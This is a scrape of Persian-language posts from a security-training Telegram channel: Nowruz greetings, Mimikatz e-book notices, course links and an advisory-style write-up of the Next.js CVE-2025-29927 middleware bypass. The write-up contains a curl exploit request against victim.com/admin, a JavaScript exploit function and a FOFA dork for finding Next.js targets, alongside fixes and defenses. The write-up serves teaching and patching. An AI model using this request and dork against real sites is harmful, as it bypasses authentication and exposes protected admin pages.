This media is not supported in your browser
VIEW IN TELEGRAM
🎊 پیشاپیش نوروز یادگار پرارج نیاکان ، شراره ی فروزان فرهنگ ایرانزمین، نشانی ز روزگاران یگانگی و سرفرازی ایرانیان بر شما پرسرور باد. 🎉
@TryHackBox
@TryHackBox
❤5👎5
درود دوستان این عیدی ما به شما
عیدی اول :
راهنمای جامع ابزار Mimikatz
این کتاب به بررسی ابزار Mimikatz میپردازد که برای استخراج پسوردها، هشها و توکنهای دسترسی از حافظه سیستم استفاده میشود. در این کتاب، شما با تکنیکهای پایه تا پیشرفته Mimikatz آشنا خواهید شد، از جمله استخراج اعتبارنامهها، دور زدن مکانیزمهای امنیتی و افزایش دسترسی. همچنین، نمونههایی از حملات واقعی که از Mimikatz استفاده کردهاند و نحوه مقابله با این ابزار بررسی شده است.
عیدی دوم ما :
آشنایی مقدماتی با Mimikatz
این کتاب به بررسی ابزار Mimikatz میپردازد که برای استخراج پسوردها و اعتبارنامهها از حافظه سیستم استفاده میشود. در این کتاب، شما با نحوه کار Mimikatz، قابلیتهای کلیدی آن، و نمونههایی از APT هکرها که از این ابزار استفاده کردهاند آشنا خواهید شد. همچنین، روشهای مقابله با Mimikatz و عبور از نرمافزارهای امنیتی نیز بررسی شده است.
برای دسترسی به کتابچه میمیکتز از لینک زیر استفاده کنید
@TryHackBox
عیدی اول :
راهنمای جامع ابزار Mimikatz
این کتاب به بررسی ابزار Mimikatz میپردازد که برای استخراج پسوردها، هشها و توکنهای دسترسی از حافظه سیستم استفاده میشود. در این کتاب، شما با تکنیکهای پایه تا پیشرفته Mimikatz آشنا خواهید شد، از جمله استخراج اعتبارنامهها، دور زدن مکانیزمهای امنیتی و افزایش دسترسی. همچنین، نمونههایی از حملات واقعی که از Mimikatz استفاده کردهاند و نحوه مقابله با این ابزار بررسی شده است.
عیدی دوم ما :
آشنایی مقدماتی با Mimikatz
این کتاب به بررسی ابزار Mimikatz میپردازد که برای استخراج پسوردها و اعتبارنامهها از حافظه سیستم استفاده میشود. در این کتاب، شما با نحوه کار Mimikatz، قابلیتهای کلیدی آن، و نمونههایی از APT هکرها که از این ابزار استفاده کردهاند آشنا خواهید شد. همچنین، روشهای مقابله با Mimikatz و عبور از نرمافزارهای امنیتی نیز بررسی شده است.
برای دسترسی به کتابچه میمیکتز از لینک زیر استفاده کنید
https://github.com/TryHackBox/Books
@TryHackBox
👍15
Try Hack Box
درود دوستان این عیدی ما به شما عیدی اول : راهنمای جامع ابزار Mimikatz این کتاب به بررسی ابزار Mimikatz میپردازد که برای استخراج پسوردها، هشها و توکنهای دسترسی از حافظه سیستم استفاده میشود. در این کتاب، شما با تکنیکهای پایه تا پیشرفته Mimikatz آشنا…
اگر این کتابچه برای شما مفید بود، لطفاً با دادن یک ستاره (Star) در گیتهاب، شما هم یک عیدی به ما بدید .
سال نو خجسته باد!
سال نو خجسته باد!
《 همه ساله بخت تو پیروز باد 》
《 همه روزگار تو نوروز باد 》
عید باشکوه و باستانی نوروز را به تمامی اعضای کانال که پا به پای ما حضور داشتند و چه در لحظات سخت و چه در لحظات خوشی مارا همراهی کردند شاد باش عرض میکنم امیدوارم که سال پر از خیر و برکتی را کنار خانواده و دوستان خود سپری کنید
پاینده باد ایران
@TryHackBox
《 همه روزگار تو نوروز باد 》
عید باشکوه و باستانی نوروز را به تمامی اعضای کانال که پا به پای ما حضور داشتند و چه در لحظات سخت و چه در لحظات خوشی مارا همراهی کردند شاد باش عرض میکنم امیدوارم که سال پر از خیر و برکتی را کنار خانواده و دوستان خود سپری کنید
پاینده باد ایران
@TryHackBox
❤7
This media is not supported in your browser
VIEW IN TELEGRAM
حضور پر شور مردم در لحظه تحویل سال ۱۴۰۴ در شهرستان پاسارگاد, آرامگاه کورش بزرگ
❤27👎8❤🔥1
بحث خارج از امنیت ممنوع
گپ پرسش و پاسخ
https://news.1rj.ru/str/+XPV3S0tygl1lZGE0
کانال ها :
@TryHackBoxStory
@TryHackBoxOfficial
گپ پرسش و پاسخ
https://news.1rj.ru/str/+XPV3S0tygl1lZGE0
کانال ها :
@TryHackBoxStory
@TryHackBoxOfficial
Telegram
TryHackBoxGp
بحث خارج از امنیت ممنوع
گپ پرسش و پاسخ
کانال ها :
@TryHackBox
@TryHackBoxOfficial
گپ پرسش و پاسخ
کانال ها :
@TryHackBox
@TryHackBoxOfficial
اطلاعات مربوط به نام میزبان.pdf
820.7 KB
این پست به بررسی اطلاعات نام میزبان ها (Hostnames) و نقش کلیدی آنها در حملات سایبری و تست نفوذ میپردازد.
📌 آنچه در این پست یاد میگیرید:
🔹 شناسایی اهداف حیاتی شبکه با تحلیل نام میزبانها (مثل VPN، Citrix، Exchange، SSO).
🔹 تکنیکهای نفوذ :
حمله Password Spraying به سرویسهای بدون MFA (مثال: VPN، Citrix).
🔹 استفاده از Log Stealer برای استخراج اعتبارنامه ها و Lateral Movement.
🔹 ابزارهای کلیدی: Nmap, Hydra, Metasploit, OpenVPN.
🔹 مثالهای عملی با دستورات فنی (اسکن پورتها، تست Breakout در Citrix، سرقت لاگها).
🔹 دفاع مؤثر: محدودسازی دسترسی، رمزنگاری لاگها، نظارت بر فعالیت ها.
#Recon
@TryHackBox
📌 آنچه در این پست یاد میگیرید:
🔹 شناسایی اهداف حیاتی شبکه با تحلیل نام میزبانها (مثل VPN، Citrix، Exchange، SSO).
🔹 تکنیکهای نفوذ :
حمله Password Spraying به سرویسهای بدون MFA (مثال: VPN، Citrix).
🔹 استفاده از Log Stealer برای استخراج اعتبارنامه ها و Lateral Movement.
🔹 ابزارهای کلیدی: Nmap, Hydra, Metasploit, OpenVPN.
🔹 مثالهای عملی با دستورات فنی (اسکن پورتها، تست Breakout در Citrix، سرقت لاگها).
🔹 دفاع مؤثر: محدودسازی دسترسی، رمزنگاری لاگها، نظارت بر فعالیت ها.
#Recon
@TryHackBox
👍4❤2🙏1
Try Hack Box
#جلسه_چهارم دوره #رایگان سکوریتی پلاس | Security + بخش : رمزنگاری دوره Security+ یک دوره معتبر و پایهای در زمینه امنیت سایبری است که توسط CompTIA ارائه میشود. این دوره به شما مهارتهای لازم برای شناسایی و مدیریت تهدیدات امنیتی و مقابله با حملات، پیادهسازی…
#جلسه_پنجم دوره #رایگان سکوریتی پلاس | Security +
بخش : ادامه رمزنگاری
دوره Security+ یک دوره معتبر و پایهای در زمینه امنیت سایبری است که توسط CompTIA ارائه میشود. این دوره به شما مهارتهای لازم برای شناسایی و مدیریت تهدیدات امنیتی و مقابله با حملات، پیادهسازی راهکارهای امنیتی،اصول رمزنگاری و درک اصول امنیت شبکه را آموزش میدهد.
قسمت اول :
https://youtu.be/Hn5qheOVz6Q
قسمت دوم :
https://youtu.be/R8Qzq0qQm3Q
قسمت سوم :
https://youtu.be/bE1KSm7U8uE
قسمت چهارم :
https://youtu.be/wOFhAGvFCSA
قسمت پنجم :
https://youtu.be/7xhLSLB79EI
----------
🆔 @TryHackBox
----------
بخش : ادامه رمزنگاری
دوره Security+ یک دوره معتبر و پایهای در زمینه امنیت سایبری است که توسط CompTIA ارائه میشود. این دوره به شما مهارتهای لازم برای شناسایی و مدیریت تهدیدات امنیتی و مقابله با حملات، پیادهسازی راهکارهای امنیتی،اصول رمزنگاری و درک اصول امنیت شبکه را آموزش میدهد.
قسمت اول :
https://youtu.be/Hn5qheOVz6Q
قسمت دوم :
https://youtu.be/R8Qzq0qQm3Q
قسمت سوم :
https://youtu.be/bE1KSm7U8uE
قسمت چهارم :
https://youtu.be/wOFhAGvFCSA
قسمت پنجم :
https://youtu.be/7xhLSLB79EI
انتقادی داشتید حتما اطلاع بدید، تا بتونیم آموزش با کیفیتتری ارائه بدیم،امیدواریم از آموزش لذت ببرید.
----------
🆔 @TryHackBox
----------
👍8🙏2
Try Hack Box
#جلسه_پنجم دوره #رایگان سکوریتی پلاس | Security + بخش : ادامه رمزنگاری دوره Security+ یک دوره معتبر و پایهای در زمینه امنیت سایبری است که توسط CompTIA ارائه میشود. این دوره به شما مهارتهای لازم برای شناسایی و مدیریت تهدیدات امنیتی و مقابله با حملات،…
دوستانی که دوره سکوریتی پلاس مارو میگذرونند ، ما یک گروه ایجاد کردیم که فایل تمرینی یا اگر سوالی یا مشکلی داشتید بپرسید و فایل ها رو در اختیارتون قرار بدیم اگر مایل بودید به گروه بپیوندید به ما پیام دهید لینک گروه رو ارسال کنیم برای شما :
@Unique_exploitbot
@Unique_exploitbot
دوستان از این بعد لوگوی ما این خواهد بود و در مقالات و کتابها از این لوگو استفاده خواهیم کرد
🔥10👍1🌚1
#CVE-2025-29927
در فریمورک Next.js React یک آسیبپذیری امنیتی بحرانی شناسایی شده است که تحت شرایط خاص میتواند برای دور زدن بررسیهای احراز هویت مورد سوءاستفاده قرار گیرد.
این آسیبپذیری با شناسه CVE-2025-29927 ردیابی شده و امتیاز ۹.۱ از ۱۰ در مقیاس CVSS دارد.
Next.js از هدر داخلی
برای جلوگیری از ایجاد حلقههای بینهایت در درخواستهای بازگشتی استفاده میکند.
با این حال، رد شدن اجرای Middleware باعث میشود درخواستها بتوانند بررسیهای حیاتی، از جمله اعتبارسنجی کوکیهای احراز هویت، قبل از رسیدن به مسیرهای موردنظر را دور بزنند.
این مشکل در نسخههای ۱۲.۳.۵، ۱۳.۵.۹، ۱۴.۲.۲۵ و ۱۵.۲.۳ برطرف شده است. به عنوان راهکار موقت، توصیه میشود از پردازش درخواستهای کاربران خارجی که حاوی هدر
راشد علام (با نامهای مستعار zhero و cold-try )، محققی که این آسیبپذیری را کشف و گزارش کرد، جزئیات فنی بیشتری را افشا کرده است. بنابراین، توصیه میشود هرچه سریعتر پچ های امنیتی اعمال شوند.
به گفته JFrog، این باگ به مهاجمان اجازه میدهد به راحتی بررسیهای احراز هویت در Middleware ی Next.js را دور بزنند که ممکن است منجر به دسترسی به صفحات حساس وبسایت (مخصوص مدیران یا کاربران با دسترسی بالا) شود.
همچنین هشدار داده شده که هر وبسایتی که از Middleware برای کنترل دسترسی کاربران بدون بررسیهای اضافی استفاده میکند، در معرض این آسیبپذیری (CVE-2025-29927) قرار دارد و مهاجمان میتوانند به منابع غیرمجاز دسترسی پیدا کنند.
@TryHackBox
در فریمورک Next.js React یک آسیبپذیری امنیتی بحرانی شناسایی شده است که تحت شرایط خاص میتواند برای دور زدن بررسیهای احراز هویت مورد سوءاستفاده قرار گیرد.
این آسیبپذیری با شناسه CVE-2025-29927 ردیابی شده و امتیاز ۹.۱ از ۱۰ در مقیاس CVSS دارد.
Next.js از هدر داخلی
x-middleware-subrequestبرای جلوگیری از ایجاد حلقههای بینهایت در درخواستهای بازگشتی استفاده میکند.
با این حال، رد شدن اجرای Middleware باعث میشود درخواستها بتوانند بررسیهای حیاتی، از جمله اعتبارسنجی کوکیهای احراز هویت، قبل از رسیدن به مسیرهای موردنظر را دور بزنند.
این مشکل در نسخههای ۱۲.۳.۵، ۱۳.۵.۹، ۱۴.۲.۲۵ و ۱۵.۲.۳ برطرف شده است. به عنوان راهکار موقت، توصیه میشود از پردازش درخواستهای کاربران خارجی که حاوی هدر
x-middleware-subrequest هستند، جلوگیری شود. راشد علام (با نامهای مستعار zhero و cold-try )، محققی که این آسیبپذیری را کشف و گزارش کرد، جزئیات فنی بیشتری را افشا کرده است. بنابراین، توصیه میشود هرچه سریعتر پچ های امنیتی اعمال شوند.
به گفته JFrog، این باگ به مهاجمان اجازه میدهد به راحتی بررسیهای احراز هویت در Middleware ی Next.js را دور بزنند که ممکن است منجر به دسترسی به صفحات حساس وبسایت (مخصوص مدیران یا کاربران با دسترسی بالا) شود.
همچنین هشدار داده شده که هر وبسایتی که از Middleware برای کنترل دسترسی کاربران بدون بررسیهای اضافی استفاده میکند، در معرض این آسیبپذیری (CVE-2025-29927) قرار دارد و مهاجمان میتوانند به منابع غیرمجاز دسترسی پیدا کنند.
@TryHackBox
👍1
Try Hack Box
#CVE-2025-29927 در فریمورک Next.js React یک آسیبپذیری امنیتی بحرانی شناسایی شده است که تحت شرایط خاص میتواند برای دور زدن بررسیهای احراز هویت مورد سوءاستفاده قرار گیرد. این آسیبپذیری با شناسه CVE-2025-29927 ردیابی شده و امتیاز ۹.۱ از ۱۰ در مقیاس CVSS…
مکانیزم آسیبپذیری
این آسیبپذیری مربوط به رفتار نادرست سیستم Middleware در Next.js هنگام پردازش هدر x-middleware-subrequest است. این هدر به صورت داخلی توسط Next.js برای جلوگیری از حلقههای بازگشتی (recursive loops) در درخواستهای Middleware استفاده میشود.
کد آسیبپذیر (شبیهسازی):
نحوه سوءاستفاده
مهاجم میتواند با اضافه کردن هدر جعلی به درخواستهای خود، Middleware را دور بزند:
@TryHackBox
این آسیبپذیری مربوط به رفتار نادرست سیستم Middleware در Next.js هنگام پردازش هدر x-middleware-subrequest است. این هدر به صورت داخلی توسط Next.js برای جلوگیری از حلقههای بازگشتی (recursive loops) در درخواستهای Middleware استفاده میشود.
کد آسیبپذیر (شبیهسازی):
// middleware.js (نسخههای آسیبپذیر)
export function middleware(request) {
const isSubRequest = request.headers.get('x-middleware-subrequest');
if (isSubRequest) {
return NextResponse.next();
}
// بررسیهای احراز هویت
if (!isAuthenticated(request)) {
return new Response('Unauthorized', { status: 401 });
}
return NextResponse.next();
}
نحوه سوءاستفاده
مهاجم میتواند با اضافه کردن هدر جعلی به درخواستهای خود، Middleware را دور بزند:
curl -H "x-middleware-subrequest: 1" https://victim.com/admin
@TryHackBox
👏3❤1
Try Hack Box
مکانیزم آسیبپذیری این آسیبپذیری مربوط به رفتار نادرست سیستم Middleware در Next.js هنگام پردازش هدر x-middleware-subrequest است. این هدر به صورت داخلی توسط Next.js برای جلوگیری از حلقههای بازگشتی (recursive loops) در درخواستهای Middleware استفاده میشود.…
نمونه کد اکسپلویت
راهکارهای اصلاح
ارتقاء نسخه: استفاده از نسخههای اصلاح شده Next.js
میانافزار اصلاح شده:
راهکارهای دفاعی:
پیادهسازی بررسیهای احراز هویت در سطح صفحه
استفاده از کوکیهای امنیتی با HttpOnly و SameSite Strict
لاگگیری از درخواستهای حاوی هدر مشکوک
این آسیبپذیری نمونهای از مشکل اعتماد نابجا (Overreliance on Client-Supplied Headers) است. سیستم Middleware Next.js به صورت پیشفرض به هدرهای ارسالی توسط کلاینت اعتماد کرده بود، بدون آنکه مکانیسمی برای تأیید صحت آنها وجود داشته باشد.
این مشکل در معماری سیستمهای مبتنی بر Middleware رایج است، چرا که توسعهدهندگان اغلب فرض میکنند که برخی هدرها فقط توسط سیستم داخلی قابل استفاده هستند
@TryHackBox
async function exploit(targetUrl, protectedRoute) {
const headers = new Headers();
headers.append('x-middleware-subrequest', '1');
const response = await fetch(`${targetUrl}${protectedRoute}`, {
headers: headers
});
return response.status === 200;
}راهکارهای اصلاح
ارتقاء نسخه: استفاده از نسخههای اصلاح شده Next.js
میانافزار اصلاح شده:
export function middleware(request) {
// بررسی منشأ درخواست
const isInternalRequest = request.headers.get('x-verified-internal') === 'true';
// فقط برای درخواستهای داخلی اجازه رد شدن بدهد
if (request.headers.get('x-middleware-subrequest') && !isInternalRequest) {
return new Response('Invalid request', { status: 400 });
}
// ادامه منطق احراز هویت
}راهکارهای دفاعی:
پیادهسازی بررسیهای احراز هویت در سطح صفحه
استفاده از کوکیهای امنیتی با HttpOnly و SameSite Strict
لاگگیری از درخواستهای حاوی هدر مشکوک
این آسیبپذیری نمونهای از مشکل اعتماد نابجا (Overreliance on Client-Supplied Headers) است. سیستم Middleware Next.js به صورت پیشفرض به هدرهای ارسالی توسط کلاینت اعتماد کرده بود، بدون آنکه مکانیسمی برای تأیید صحت آنها وجود داشته باشد.
این مشکل در معماری سیستمهای مبتنی بر Middleware رایج است، چرا که توسعهدهندگان اغلب فرض میکنند که برخی هدرها فقط توسط سیستم داخلی قابل استفاده هستند
@TryHackBox
👏5❤1👍1🔥1
Try Hack Box
نمونه کد اکسپلویت async function exploit(targetUrl, protectedRoute) { const headers = new Headers(); headers.append('x-middleware-subrequest', '1'); const response = await fetch(`${targetUrl}${protectedRoute}`, { headers: headers }); return…
دورک :
https://en.fofa.info/result?qbase64=YXBwPSJORVhULkpTIg%3D%3D
FOFA Query:app="NEXT.JS"
@TryHackBox
https://en.fofa.info/result?qbase64=YXBwPSJORVhULkpTIg%3D%3D
FOFA Query:app="NEXT.JS"
@TryHackBox
FOFA
FOFA Search Engine
FOFA is a Cyberspace search engine. By conducting Cyberspace mapping, it can help researchers or enterprises quickly match network assets, such as vulnerability impact range analysis, application distribution statistics, and application popularity ranking…
تحلیل Limitless OSINT Challenges - تمرینهای پیشرفته جمعآوری اطلاعات آزاد
معرفی Limitless OSINT Challenges
یک مجموعه تمرین عملی برای متخصصان و علاقهمندان به جمعآوری اطلاعات از منابع آزاد (OSINT) است که در وبسایت http://limitless-osint.com/challenges ارائه شده است.
#Osint
@TryHackBox
معرفی Limitless OSINT Challenges
یک مجموعه تمرین عملی برای متخصصان و علاقهمندان به جمعآوری اطلاعات از منابع آزاد (OSINT) است که در وبسایت http://limitless-osint.com/challenges ارائه شده است.
#Osint
@TryHackBox
🔥3👍2
🧩 کانال های دیگر ما :
🔆 در اینجا رودمپ های مختلف میزاریم و یکسری منابع :
➖➖➖➖➖➖➖➖➖➖
🆔 @TryHackBoxOfficial
➖➖➖➖➖➖➖➖➖➖
🔆 در اینجا هم داستان مربوط هک و مهندسی اجتماعی و اوسینت میزاریم :
➖➖➖➖➖➖➖➖➖➖
🆔 @TryHackBoxStory
➖➖➖➖➖➖➖➖➖➖
🔆 در اینجا رودمپ های مختلف میزاریم و یکسری منابع :
➖➖➖➖➖➖➖➖➖➖
🆔 @TryHackBoxOfficial
➖➖➖➖➖➖➖➖➖➖
🔆 در اینجا هم داستان مربوط هک و مهندسی اجتماعی و اوسینت میزاریم :
➖➖➖➖➖➖➖➖➖➖
🆔 @TryHackBoxStory
➖➖➖➖➖➖➖➖➖➖
👍2
دوستان ما بخشی رو راه اندازی کردیم به اسم رادیو زیرو پاد که در اینجا فعلا داستان هایی که قرار میدیم رو برای شما به صورت پادکست در اوردیم و اگر استقبال خوبی بشه بقیه موارد هم به پادکست اضافه می شود .
درحال حاضر میتوانید داستان هایی که قرار دادیم را به طور پادکست پلی کنید و لذت ببرید .
@RadioZeroPod
درحال حاضر میتوانید داستان هایی که قرار دادیم را به طور پادکست پلی کنید و لذت ببرید .
@RadioZeroPod
❤🔥8👍4
دوستان درحال راه اندازی لابراتور برای شما هستم
و درگیر ترجمه یک کتاب که به زودی قرار میگیره
برای همین ممکنه فعلا پست آموزشی نباشه
با تشکر از صبر شما .
و درگیر ترجمه یک کتاب که به زودی قرار میگیره
برای همین ممکنه فعلا پست آموزشی نباشه
با تشکر از صبر شما .
🤩21❤3🔥1
درود دوستان عزیز
اگر از آموزشهای ما استفاده میکنید و دوست دارید از تلاش ما حمایت کنید، میتوانید از طریق لینک زیر کمک کوچکی به ما داشته باشید ❤:
https://daramet.com/TryHackBox
راستش را بخواهید، من همیشه از درخواست دونیت راحت نبودم، اما شرایطی پیش آمده که مجبورم این را امتحان کنم. امیدوارم شما دوستان درک کنید.
ممنون که همراه ما هستید.
اگر از آموزشهای ما استفاده میکنید و دوست دارید از تلاش ما حمایت کنید، میتوانید از طریق لینک زیر کمک کوچکی به ما داشته باشید ❤:
https://daramet.com/TryHackBox
راستش را بخواهید، من همیشه از درخواست دونیت راحت نبودم، اما شرایطی پیش آمده که مجبورم این را امتحان کنم. امیدوارم شما دوستان درک کنید.
ممنون که همراه ما هستید.
❤10👍1👏1